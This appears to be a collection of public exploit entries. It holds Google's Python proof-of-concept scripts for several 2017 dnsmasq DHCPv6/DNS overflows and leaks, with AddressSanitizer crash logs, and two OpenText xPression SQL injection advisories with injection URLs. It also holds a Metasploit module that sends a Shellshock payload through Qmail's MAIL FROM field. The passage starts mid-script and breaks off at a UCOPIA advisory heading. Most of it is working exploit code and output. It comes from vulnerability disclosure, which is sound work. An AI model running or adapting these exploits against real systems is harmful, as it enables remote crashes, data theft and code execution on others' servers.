s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
Sadly, there are no easy docker setup instructions available.
Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = oom()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
if __name__ == '__main__':
assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
u16(0x0313), u8(0x37), # transaction ID
b"_" * (34 - 4),
# Option 79 = OPTION6_CLIENT_MAC
# Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
])
host, port = sys.argv[1:]
send_packet(pkg, host, int(port))
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq-dhcp: router advertisement on fd00::
dnsmasq-dhcp: IPv6 router advertisement enabled
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 2050 bytes to ::1
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
WRITE of size 4 at 0x61900000ea81 thread T0
#0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
#1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
#2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
#3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
#4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
#5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
#3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
#4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==556==ABORTING
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import socket
import sys
ND_ROUTER_SOLICIT = 133
ICMP6_OPT_SOURCE_MAC = 1
def u8(x):
return pack("B", x)
def send_packet(data, host):
print("[+] sending {} bytes to {}".format(len(data), host))
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, 0)) != len(data):
print("[!] Could not send (full) payload")
s.close()
if __name__ == '__main__':
assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
host, = sys.argv[1:]
pkg = b"".join([
u8(ND_ROUTER_SOLICIT), # type
u8(0), # code
b"X" * 2, # checksum
b"\x00" * 4, # reserved
u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
u8(255), # Have 255 MACs!
b"A" * 255 * 8,
])
send_packet(pkg, host)
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal let’s launch attacker controlled DNS server:
# python poc.py 127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache
4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
WRITE of size 1 at 0x62200001dd0b thread T0
#0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
#1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
#2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
#3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
Shadow bytes around the buggy address:
0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1159==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import struct
import sys
def dw(x):
return struct.pack('>H', x)
def udp_handler(sock_udp):
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id = struct.unpack('>H', data[0:2])[0]
query = data[12:]
data = dw(id) # id
data += dw(0x85a0) # flags
data += dw(1) # questions
data += dw(0x52) # answers
data += dw(0) # authoritative
data += dw(0) # additional
# Add the question back - we're just hardcoding it
data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
'\x00\x0c' + # type = 'PTR'
'\x00\x01') # cls = 'IN'
# Add the first answer
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x04\x00' + # size of this resource record
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x0e' + 'Z'*14 +
'\x00')
# Add the next answer, which is written out in full
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x26' + # size of this resource record
'\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
for _ in range(79):
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x02' + # size of the compressed resource record
'\xc4\x40') # pointer to the second record's name
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x11' + # size of this resource record
'\x04EEEE\x09DAABBEEEE\xc4\x49')
sock_udp.sendto(data, addr)
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>\n' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((ip, port))
print 'Listening at %s:%d\n' % (ip, port)
while True:
udp_handler(sock_udp)
sock_udp.close()
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
^
Results can be retrieved using blind SQL injection method.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
Results in the following error in response:
HTTP/1.1 200 OK
[...]
<b>Errors: </b>
See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Smtp
def initialize(info={})
super(update_info(info,
'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO field (usually admin@exampledomain.com).
The exploit does not work on the "qmailrocks" community version
as it ensures the MAILFROM field is well-formed.
},
'Author' =>
[
'Mario Ledo (Metasploit module)',
'Gabriel Follon (Metasploit module)',
'Kyle George (Vulnerability discovery)'
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'References' =>
[
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
['URL', 'https://lists.gt.net/qmail/users/138578']
],
'Payload' =>
{
'BadChars' => "\x3e",
'Space' => 888,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby python'
# telnet ruby python and perl works only if installed on target
}
},
'Targets' => [ [ 'Automatic', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'
))
deregister_options('MAILFROM')
end
def smtp_send(data = nil)
begin
result = ''
code = 0
sock.put("#{data}")
result = sock.get_once
result.chomp! if (result)
code = result[0..2].to_i if result
return result, code
rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
return result, 0
rescue ::Exception => e
print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
return nil, 0
end
end
def exploit
to = datastore['MAILTO']
connect
result = smtp_send("HELO localhost\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status('Sending the payload...')
result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status("Sending RCPT TO #{to}")
result = smtp_send("rcpt to:<#{to}>\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n")
if result[1] < 200 || result[1] > 354
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
disconnect
end
end
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
## Asset Description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
